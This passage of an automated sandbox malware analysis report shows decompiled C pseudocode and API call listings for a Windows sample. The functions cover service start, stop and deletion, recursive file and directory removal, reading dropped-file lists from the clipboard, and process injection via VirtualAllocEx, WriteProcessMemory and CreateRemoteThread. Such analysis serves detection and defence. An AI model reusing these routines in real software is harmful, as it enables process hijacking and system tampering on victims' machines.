                                      • Part of subcall function 24016858: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000002,00000000,00000000,00000000,240168FD,?,?,?), ref: 240168C6
                                      • Part of subcall function 24016858: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000002,00000000,00000000,00000000,240168FD,?,?,?), ref: 240168D5
                                    • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,000F01FF,00000110,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2403CCBF
                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,?,00000000,?,?,000F01FF,00000110,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2403CCC5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Close$HandleServiceToken$AdjustCreateOpenPrivilegesProcessValue$CurrentLookupManagerPrivilegeVersion
                                    • String ID: Description$System\CurrentControlSet\Services\
                                    • API String ID: 3877902884-3489731058
                                    • Opcode ID: 27c5136e045811c0f98c276f7e750356051cc7a871b4ed16b06484aabe983248
                                    • Instruction ID: 35baf9f97d1956f7fef9af1c6c2d0b21c0a37ab9bda884b1031cb616d047968a
                                    • Opcode Fuzzy Hash: 27c5136e045811c0f98c276f7e750356051cc7a871b4ed16b06484aabe983248
                                    • Instruction Fuzzy Hash: 9721A271A04209ABFF01DBA1CC51FAEBFB8EB55B44F108465F504E7298DA749AC1CA64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2403C858, Relevance: 10.6, APIs: 7, Instructions: 89serviceCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 72%
                                    			E2403C858(char __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				char* _v44;
				struct _SERVICE_STATUS _v48;
				void* _t25;
				void* _t34;
				void* _t36;
				void* _t46;
				intOrPtr _t52;
				signed int _t54;
				void* _t56;
				void* _t61;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t58 = _a4;
				E24013524(_v8);
				_push(_t61);
				_push(0x2403c93e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xffffffd4;
				E24013088(_a4);
				_v44 = 0;
				_v20 = 0;
				_t25 = OpenSCManagerA(0, 0, 0xf003f);
				_t46 = _t25;
				if(_t46 > 0) {
					asm("sbb eax, eax");
					if(_t25 + 1 != 1) {
						_t54 = 0x20;
					} else {
						_t54 = 0x10;
					}
					_t34 = OpenServiceA(_t46, E24013534(_v8), _t54 | 0x00000004);
					_t56 = _t34;
					if(_t56 > 0) {
						asm("sbb eax, eax");
						_t36 = _t34 + 1;
						if(_t36 == 1) {
							asm("sbb eax, eax");
							if(_t36 + 1 != 1) {
								ControlService(_t56, 1,  &_v48);
							} else {
								StartServiceA(_t56, 0,  &_v20);
							}
						}
						QueryServiceStatus(_t56,  &_v48);
						CloseServiceHandle(_t56);
					}
					CloseServiceHandle(_t46);
				}
				E2403C7A8(_v44, _t58);
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(0x2403c945);
				return E24013088( &_v8);
			}

















                                    0x2403c861
                                    0x2403c864
                                    0x2403c867
                                    0x2403c86a
                                    0x2403c870
                                    0x2403c877
                                    0x2403c878
                                    0x2403c87d
                                    0x2403c880
                                    0x2403c885
                                    0x2403c88c
                                    0x2403c891
                                    0x2403c89d
                                    0x2403c8a2
                                    0x2403c8a6
                                    0x2403c8ac
                                    0x2403c8b1
                                    0x2403c8ba
                                    0x2403c8b3
                                    0x2403c8b3
                                    0x2403c8b3
                                    0x2403c8cd
                                    0x2403c8d2
                                    0x2403c8d6
                                    0x2403c8dc
                                    0x2403c8de
                                    0x2403c8e1
                                    0x2403c8e7
                                    0x2403c8ec
                                    0x2403c903
                                    0x2403c8ee
                                    0x2403c8f5
                                    0x2403c8f5
                                    0x2403c8ec
                                    0x2403c90d
                                    0x2403c913
                                    0x2403c913
                                    0x2403c919
                                    0x2403c919
                                    0x2403c923
                                    0x2403c92a
                                    0x2403c92d
                                    0x2403c930
                                    0x2403c93d

                                    APIs
                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,2403C93E), ref: 2403C89D
                                    • OpenServiceA.ADVAPI32(00000000,00000000,00000020,00000000,00000000,000F003F,00000000,2403C93E), ref: 2403C8CD
                                    • StartServiceA.ADVAPI32(00000000,00000000,?,00000000,00000000,00000020,00000000,00000000,000F003F,00000000,2403C93E), ref: 2403C8F5
                                    • ControlService.ADVAPI32(00000000,00000001,?,00000000,00000000,00000020,00000000,00000000,000F003F,00000000,2403C93E), ref: 2403C903
                                    • QueryServiceStatus.ADVAPI32(00000000,?,00000000,00000000,00000020,00000000,00000000,000F003F,00000000,2403C93E), ref: 2403C90D
                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,?,00000000,00000000,00000020,00000000,00000000,000F003F,00000000,2403C93E), ref: 2403C913
                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000020,00000000,00000000,000F003F,00000000,2403C93E), ref: 2403C919
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandleOpen$ControlManagerQueryStartStatus
                                    • String ID:
                                    • API String ID: 1698138069-0
                                    • Opcode ID: f9da81692bd7f285b234d7db9ed7a73cf46160bdadc886a8ae52b637bd45b1e9
                                    • Instruction ID: cb3caa9afefb471f7513133a4c9a35564aa214a0e4463a39af8505232a5b0747
                                    • Opcode Fuzzy Hash: f9da81692bd7f285b234d7db9ed7a73cf46160bdadc886a8ae52b637bd45b1e9
                                    • Instruction Fuzzy Hash: EE218173E08248AEFB01DB788C44BAE7FFC9B69A18F114476E404E3244D6749AC28A64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2403B354, Relevance: 10.6, APIs: 7, Instructions: 70injectionmemorythreadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 76%
                                    			E2403B354(void* __eax, void* __ecx, _Unknown_base(*)()* __edx) {
				long _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				_Unknown_base(*)()* _v36;
				void* _t18;
				void* _t30;
				struct HINSTANCE__* _t32;
				void* _t35;
				long _t36;
				void* _t37;

				_v32 = __ecx;
				_v36 = __edx;
				_t30 = __eax;
				_v28 = 0;
				_t32 = GetModuleHandleA(0);
				_push(0);
				_push(_t32);
				asm("cdq");
				_t18 =  *((intOrPtr*)(_t32 + 0x3c)) + _v20;
				asm("adc edx, [esp+0x4]");
				_t36 =  *(_t18 + 0x50);
				_t35 =  *(_t18 + 0x34);
				VirtualFreeEx(_t30, _t35, 0, 0x8000);
				_t37 = VirtualAllocEx(_t30, _t35, _t36, 0x3000, 0x40);
				if(_t37 != 0) {
					WriteProcessMemory(_t30, _t35, GetModuleHandleA(0), _t36,  &_v24);
					if(_t36 <= _v24) {
						CreateRemoteThread(_t30, 0, 0, _v36, _v32, 0,  &_v20);
						CloseHandle(_t30);
						_v32 = _t37;
					}
				}
				return _v28;
			}














                                    0x2403b35b
                                    0x2403b35f
                                    0x2403b362
                                    0x2403b366
                                    0x2403b371
                                    0x2403b377
                                    0x2403b378
                                    0x2403b37c
                                    0x2403b37d
                                    0x2403b380
                                    0x2403b387
                                    0x2403b38a
                                    0x2403b396
                                    0x2403b3aa
                                    0x2403b3ae
                                    0x2403b3c0
                                    0x2403b3c9
                                    0x2403b3e1
                                    0x2403b3e7
                                    0x2403b3ec
                                    0x2403b3ec
                                    0x2403b3c9
                                    0x2403b3fb

                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 2403B36C
                                    • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,?,00000000), ref: 2403B396
                                    • VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 2403B3A5
                                    • GetModuleHandleA.KERNEL32(00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 2403B3B8
                                    • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 2403B3C0
                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 2403B3E1
                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 2403B3E7
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$ModuleVirtual$AllocCloseCreateFreeMemoryProcessRemoteThreadWrite
                                    • String ID:
                                    • API String ID: 2398686212-0
                                    • Opcode ID: 320e831d3db3fd37a1909f490eb8679622ef688ad2e82d5ecf3d3b5ad779abdd
                                    • Instruction ID: 5da01fb4cc0ee853a39ee712e9e2dc1a7c9e349c9e2eeb6cd5e77aedc82156c2
                                    • Opcode Fuzzy Hash: 320e831d3db3fd37a1909f490eb8679622ef688ad2e82d5ecf3d3b5ad779abdd
                                    • Instruction Fuzzy Hash: 51111CB16483047FE350DA698C81F6FBBECDBC5758F548828B64CDB281D670E84487A6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24015FE4, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 111fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 84%
                                    			E24015FE4(char __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v332;
				char _v336;
				char _v340;
				char _v344;
				int _t55;
				signed char _t63;
				void* _t64;
				intOrPtr _t92;
				struct _WIN32_FIND_DATAA* _t103;
				void* _t105;
				void* _t108;
				void* _t112;

				_v344 = 0;
				_v340 = 0;
				_v336 = 0;
				_v12 = 0;
				_v8 = __eax;
				E24013524(_v8);
				_t103 =  &_v332;
				_push(_t108);
				_push(0x24016160);
				_push( *[fs:eax]);
				 *[fs:eax] = _t108 + 0xfffffeac;
				if( *((char*)(_v8 + E2401333C(_v8) - 1)) != 0x5c) {
					E24013344( &_v8, 0x24016178);
				}
				E24013388( &_v336, 0x24016184, _v8);
				_t105 = FindFirstFileA(E24013534(_v336), _t103);
				_t112 = _t105 - 0xffffffff;
				if(_t112 == 0) {
					L15:
					_pop(_t92);
					 *[fs:eax] = _t92;
					_push(E24016167);
					E240130AC( &_v344, 3);
					return E240130AC( &_v12, 2);
				} else {
					goto L3;
				}
				do {
					L3:
					E240132EC( &_v12, 0x104,  &(_t103->cFileName));
					E24013480(_v12, 0x24016190);
					if(_t112 != 0) {
						E24013480(_v12, 0x2401619c);
						if(_t112 != 0) {
							_t63 = _t103->dwFileAttributes;
							if(_t63 == 0xffffffff || (_t63 & 0x00000010) == 0) {
								_t64 = 0;
							} else {
								_t64 = 1;
							}
							_t115 = _t64;
							if(_t64 != 0) {
								E24013388( &_v344, _v12, _v8);
								E24015FE4(_v344, 0, _v12, _t103, _t105, __eflags);
							} else {
								E24013388( &_v12, _v12, _v8);
								E24013274( &_v340, E24013534(_v12));
								E24016634(_v340, 0, _t103, _t105, _t115);
							}
						}
					}
					_t55 = FindNextFileA(_t105, _t103);
					asm("sbb eax, eax");
				} while (_t55 + 1 != 0);
				FindClose(_t105);
				if(RemoveDirectoryA(E24013534(_v8)) != 0) {
				}
				goto L15;
			}

















                                    0x24015ff2
                                    0x24015ff8
                                    0x24015ffe
                                    0x24016004
                                    0x24016007
                                    0x2401600d
                                    0x24016012
                                    0x2401601a
                                    0x2401601b
                                    0x24016020
                                    0x24016023
                                    0x24016038
                                    0x24016042
                                    0x24016042
                                    0x24016056
                                    0x2401606c
                                    0x2401606e
                                    0x24016071
                                    0x24016135
                                    0x24016137
                                    0x2401613a
                                    0x2401613d
                                    0x2401614d
                                    0x2401615f
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x24016077
                                    0x24016077
                                    0x24016082
                                    0x2401608f
                                    0x24016094
                                    0x2401609e
                                    0x240160a3
                                    0x240160a5
                                    0x240160aa
                                    0x240160b0
                                    0x240160b4
                                    0x240160b4
                                    0x240160b4
                                    0x240160b6
                                    0x240160b8
                                    0x240160f6
                                    0x24016101
                                    0x240160ba
                                    0x240160c3
                                    0x240160d8
                                    0x240160e3
                                    0x240160e3
                                    0x240160b8
                                    0x240160a3
                                    0x24016108
                                    0x24016110
                                    0x24016113
                                    0x2401611c
                                    0x24016131
                                    0x24016131
                                    0x00000000

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,24016160), ref: 24016067
                                    • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,24016160), ref: 24016108
                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,24016160), ref: 2401611C
                                    • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,24016160), ref: 2401612A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseDirectoryFirstNextRemove
                                    • String ID: *.*
                                    • API String ID: 81111410-438819550
                                    • Opcode ID: 6323b605bcf80f6985238b1abac504bf5e6c6c4482b9498271f4d518d36f0dc1
                                    • Instruction ID: a34b0ba2823b59bfced8c29e0b8265e5a5a036338dc48255de7d28aa505c2931
                                    • Opcode Fuzzy Hash: 6323b605bcf80f6985238b1abac504bf5e6c6c4482b9498271f4d518d36f0dc1
                                    • Instruction Fuzzy Hash: 6C416E34900618ABEF11DBE4CD80ADEBBF4AF95758F5049E4D40CA7368DB70AFC58A50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24015FE2, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 83%
                                    			E24015FE2(char __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v332;
				char _v336;
				char _v340;
				char _v344;
				int _t55;
				signed char _t63;
				void* _t64;
				intOrPtr _t91;
				struct _WIN32_FIND_DATAA* _t102;
				void* _t104;
				void* _t107;
				void* _t111;

				_v344 = 0;
				_v340 = 0;
				_v336 = 0;
				_v12 = 0;
				_v8 = __eax;
				E24013524(_v8);
				_t102 =  &_v332;
				_push(_t107);
				_push(0x24016160);
				_push( *[fs:eax]);
				 *[fs:eax] = _t107 + 0xfffffeac;
				if( *((char*)(_v8 + E2401333C(_v8) - 1)) != 0x5c) {
					E24013344( &_v8, 0x24016178);
				}
				E24013388( &_v336, 0x24016184, _v8);
				_t104 = FindFirstFileA(E24013534(_v336), _t102);
				_t111 = _t104 - 0xffffffff;
				if(_t111 == 0) {
					L16:
					_pop(_t91);
					 *[fs:eax] = _t91;
					_push(E24016167);
					E240130AC( &_v344, 3);
					return E240130AC( &_v12, 2);
				} else {
					do {
						E240132EC( &_v12, 0x104,  &(_t102->cFileName));
						E24013480(_v12, 0x24016190);
						if(_t111 != 0) {
							E24013480(_v12, 0x2401619c);
							if(_t111 != 0) {
								_t63 = _t102->dwFileAttributes;
								if(_t63 == 0xffffffff || (_t63 & 0x00000010) == 0) {
									_t64 = 0;
								} else {
									_t64 = 1;
								}
								_t114 = _t64;
								if(_t64 != 0) {
									E24013388( &_v344, _v12, _v8);
									L1();
								} else {
									E24013388( &_v12, _v12, _v8);
									E24013274( &_v340, E24013534(_v12));
									E24016634(_v340, 0, _t102, _t104, _t114);
								}
							}
						}
						_t55 = FindNextFileA(_t104, _t102);
						asm("sbb eax, eax");
					} while (_t55 + 1 != 0);
					FindClose(_t104);
					if(RemoveDirectoryA(E24013534(_v8)) != 0) {
					}
					goto L16;
				}
			}

















                                    0x24015ff2
                                    0x24015ff8
                                    0x24015ffe
                                    0x24016004
                                    0x24016007
                                    0x2401600d
                                    0x24016012
                                    0x2401601a
                                    0x2401601b
                                    0x24016020
                                    0x24016023
                                    0x24016038
                                    0x24016042
                                    0x24016042
                                    0x24016056
                                    0x2401606c
                                    0x2401606e
                                    0x24016071
                                    0x24016135
                                    0x24016137
                                    0x2401613a
                                    0x2401613d
                                    0x2401614d
                                    0x2401615f
                                    0x24016077
                                    0x24016077
                                    0x24016082
                                    0x2401608f
                                    0x24016094
                                    0x2401609e
                                    0x240160a3
                                    0x240160a5
                                    0x240160aa
                                    0x240160b0
                                    0x240160b4
                                    0x240160b4
                                    0x240160b4
                                    0x240160b6
                                    0x240160b8
                                    0x240160f6
                                    0x24016101
                                    0x240160ba
                                    0x240160c3
                                    0x240160d8
                                    0x240160e3
                                    0x240160e3
                                    0x240160b8
                                    0x240160a3
                                    0x24016108
                                    0x24016110
                                    0x24016113
                                    0x2401611c
                                    0x24016131
                                    0x24016131
                                    0x00000000
                                    0x24016131

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,24016160), ref: 24016067
                                    • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,24016160), ref: 24016108
                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,24016160), ref: 2401611C
                                    • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,24016160), ref: 2401612A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseDirectoryFirstNextRemove
                                    • String ID: *.*
                                    • API String ID: 81111410-438819550
                                    • Opcode ID: accb25b3ce662f110da8a1d23776bc648455d97cc57a3dd94dce0c7b2416f73f
                                    • Instruction ID: ea82d53e2061035ead515fc50307a785f75e63861739c87cf3ac3225c7432ef8
                                    • Opcode Fuzzy Hash: accb25b3ce662f110da8a1d23776bc648455d97cc57a3dd94dce0c7b2416f73f
                                    • Instruction Fuzzy Hash: 4D318134900508ABFF11DBE4CD40A9EB7F4AF95758F5049B4E40CA7259DB70AFC18A51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2403CDE0, Relevance: 7.6, APIs: 5, Instructions: 72clipboardfileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 49%
                                    			E2403CDE0(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v5;
				struct HWND__* _v12;
				char _v273;
				char _v280;
				void* _t19;
				intOrPtr* _t30;
				intOrPtr _t35;
				void* _t39;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				intOrPtr _t47;

				_t45 = _t46;
				_t47 = _t46 + 0xfffffeec;
				_v280 = 0;
				_t30 = __eax;
				_push(_t45);
				_push(0x2403cedc);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47;
				_v5 = 0;
				E24013088(__eax);
				OpenClipboard(0);
				_push(_t45);
				_push(0x2403cebc);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47;
				_t19 = GetClipboardData(0xf);
				_t39 = _t19;
				if(_t39 != 0) {
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(_t39);
					L2403CD98();
					E24013088(_t30);
					_t42 = _t19 - 1;
					if(_t42 >= 0) {
						_t43 = _t42 + 1;
						_v12 = 0;
						do {
							_v273 = 0;
							_push(0x105);
							_push( &_v273);
							_push(_v12);
							_push(_t39);
							L2403CD98();
							_push( *_t30);
							E240132EC( &_v280, 0x105,  &_v273);
							_push(_v280);
							_push(0x2403cef8);
							E240133FC();
							_v12 =  &(_v12->i);
							_t43 = _t43 - 1;
						} while (_t43 != 0);
					}
					_v5 = 1;
				}
				_pop(_t35);
				 *[fs:eax] = _t35;
				_push(0x2403cec3);
				return CloseClipboard();
			}
















                                    0x2403cde1
                                    0x2403cde3
                                    0x2403cdee
                                    0x2403cdf4
                                    0x2403cdf8
                                    0x2403cdf9
                                    0x2403cdfe
                                    0x2403ce01
                                    0x2403ce04
                                    0x2403ce0a
                                    0x2403ce11
                                    0x2403ce18
                                    0x2403ce19
                                    0x2403ce1e
                                    0x2403ce21
                                    0x2403ce26
                                    0x2403ce2b
                                    0x2403ce2f
                                    0x2403ce31
                                    0x2403ce33
                                    0x2403ce35
                                    0x2403ce37
                                    0x2403ce38
                                    0x2403ce41
                                    0x2403ce46
                                    0x2403ce49
                                    0x2403ce4b
                                    0x2403ce4c
                                    0x2403ce53
                                    0x2403ce53
                                    0x2403ce5a
                                    0x2403ce65
                                    0x2403ce69
                                    0x2403ce6a
                                    0x2403ce6b
                                    0x2403ce70
                                    0x2403ce83
                                    0x2403ce88
                                    0x2403ce8e
                                    0x2403ce9a
                                    0x2403ce9f
                                    0x2403cea2
                                    0x2403cea2
                                    0x2403ce53
                                    0x2403cea5
                                    0x2403cea5
                                    0x2403ceab
                                    0x2403ceae
                                    0x2403ceb1
                                    0x2403cebb

                                    APIs
                                    • OpenClipboard.USER32(00000000), ref: 2403CE11
                                    • GetClipboardData.USER32(0000000F), ref: 2403CE26
                                    • DragQueryFile.SHELL32(00000000,000000FF,00000000,00000000), ref: 2403CE38
                                    • DragQueryFile.SHELL32(00000000,00000000,00000000,00000105), ref: 2403CE6B
                                    • CloseClipboard.USER32 ref: 2403CEB6
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$DragFileQuery$CloseDataOpen
                                    • String ID:
                                    • API String ID: 3062564445-0
                                    • Opcode ID: 89d7ab5c36e8bef0298f4bdbb901d5694577ac4b5db60d6a6bd805a1f90c9232
                                    • Instruction ID: 6afa1e5f840c5f13e8d2656de05551d97ae6aca7fa8e44f6212d0a2ea933ffdf
                                    • Opcode Fuzzy Hash: 89d7ab5c36e8bef0298f4bdbb901d5694577ac4b5db60d6a6bd805a1f90c9232
                                    • Instruction Fuzzy Hash: 4D2129325086587FFB129B648C51FDF7EB8DB5AB44F4140F4F508E6288D6B59AC08A61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2403C950, Relevance: 7.5, APIs: 5, Instructions: 49serviceCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 63%
                                    			E2403C950(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				void* _t20;
				intOrPtr _t24;
				void* _t29;
				intOrPtr _t32;

				_v8 = __eax;
				E24013524(_v8);
				_push(_t32);
				_push(0x2403c9cf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				_t20 = OpenSCManagerA(0, 0, 0xf003f);
				if(_t20 > 0) {
					_t29 = OpenServiceA(_t20, E24013534(_v8), 0x10000);
					if(_t29 > 0) {
						if(DeleteService(_t29) != 0) {
						}
						CloseServiceHandle(_t29);
					}
					CloseServiceHandle(_t20);
				}
				_pop(_t24);
				 *[fs:eax] = _t24;
				_push(0x2403c9d6);
				return E24013088( &_v8);
			}








                                    0x2403c957
                                    0x2403c95d
                                    0x2403c964
                                    0x2403c965
                                    0x2403c96a
                                    0x2403c96d
                                    0x2403c980
                                    0x2403c984
                                    0x2403c99a
                                    0x2403c99e
                                    0x2403c9a8
                                    0x2403c9a8
                                    0x2403c9ae
                                    0x2403c9ae
                                    0x2403c9b4
                                    0x2403c9b4
                                    0x2403c9bb
                                    0x2403c9be
                                    0x2403c9c1
                                    0x2403c9ce

                                    APIs
                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,2403C9CF), ref: 2403C97B
                                    • OpenServiceA.ADVAPI32(00000000,00000000,00010000,00000000,00000000,000F003F,00000000,2403C9CF), ref: 2403C995
                                    • DeleteService.ADVAPI32(00000000,00000000,00000000,00010000,00000000,00000000,000F003F,00000000,2403C9CF), ref: 2403C9A1
                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000000,00010000,00000000,00000000,000F003F,00000000,2403C9CF), ref: 2403C9AE
                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00010000,00000000,00000000,000F003F,00000000,2403C9CF), ref: 2403C9B4
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandleOpen$DeleteManager
                                    • String ID:
                                    • API String ID: 204194956-0
                                    • Opcode ID: 75e6500ca8f3d60347d72bb4557b582b81b63e78b1e7c3c7ed418e0c7b65f707
                                    • Instruction ID: 109eee448292ec38bb8608b85cf9aad0d8ac39adf5294ffb4019cc38e55fe2a7
                                    • Opcode Fuzzy Hash: 75e6500ca8f3d60347d72bb4557b582b81b63e78b1e7c3c7ed418e0c7b65f707
                                    • Instruction Fuzzy Hash: 6A01F4726087047BF712DA318C59F2F7EECEF65B58F020472F900E6188DAB08EC09460
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2403EAA0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69nativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 82%
                                    			E2403EAA0(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, void** _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void** _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t42;
				struct HWND__* _t47;
				intOrPtr* _t48;
				void** _t49;

				_t42 = _a8;
				_t47 = _a4;
				_v8 = 0;
				if(_t42 == 0x81) {
					_t49 = _a16;
					SetPropA(_t47, "OBJECT",  *_t49);
					 *( *_t49 + 4) = _t47;
				}
				_v24 = _t42;
				_v20 = _a12;
				_v16 = _a16;
				_v12 = 0;
				_t48 = GetPropA(_t47, "OBJECT");
				if(_t42 != 2) {
					if(_t48 != 0) {
						 *((intOrPtr*)( *_t48 - 0x14))();
					}
					_t29 = _v12;
					if(_t29 != 0) {
						_v8 = _t29;
					} else {
						_push(_a16);
						_t32 = _a12;
						_push(_t32);
						_push(_t42);
						_push(_t47);
						L24015258();
						_v8 = _t32;
					}
				} else {
					if(_t48 != 0) {
						 *((intOrPtr*)( *_t48 - 0x14))();
						E24012688(_t48);
					}
				}
				return _v8;
			}














                                    0x2403eaa9
                                    0x2403eaac
                                    0x2403eab1
                                    0x2403eaba
                                    0x2403eabc
                                    0x2403eac8
                                    0x2403eacf
                                    0x2403eacf
                                    0x2403ead2
                                    0x2403ead8
                                    0x2403eade
                                    0x2403eae3
                                    0x2403eaf1
                                    0x2403eaf8
                                    0x2403eb13
                                    0x2403eb1c
                                    0x2403eb1c
                                    0x2403eb1f
                                    0x2403eb24
                                    0x2403eb3a
                                    0x2403eb26
                                    0x2403eb29
                                    0x2403eb2a
                                    0x2403eb2d
                                    0x2403eb2e
                                    0x2403eb2f
                                    0x2403eb30
                                    0x2403eb35
                                    0x2403eb35
                                    0x2403eafa
                                    0x2403eafc
                                    0x2403eb05
                                    0x2403eb0a
                                    0x2403eb0a
                                    0x2403eafc
                                    0x2403eb46

                                    APIs
                                    • SetPropA.USER32(?,OBJECT,00000000), ref: 2403EAC8
                                    • GetPropA.USER32(?,OBJECT), ref: 2403EAEC
                                    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 2403EB30
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Prop$NtdllProc_Window
                                    • String ID: OBJECT
                                    • API String ID: 1456104087-1481993322
                                    • Opcode ID: e18fea9311f87190c7643cae5032746983b8a6cb531c8355fb7cdca1551715fd
                                    • Instruction ID: dbfbc86dabd32b62de994fff43fd31fbc4e5809ef2df2a8c9930a013adff8ffa
                                    • Opcode Fuzzy Hash: e18fea9311f87190c7643cae5032746983b8a6cb531c8355fb7cdca1551715fd
                                    • Instruction Fuzzy Hash: 4C212E75A01219EFD701CF69C9809AFBFF8EF49650B5042A9E805E7301D7709E408BA1
                                    Uniqueness

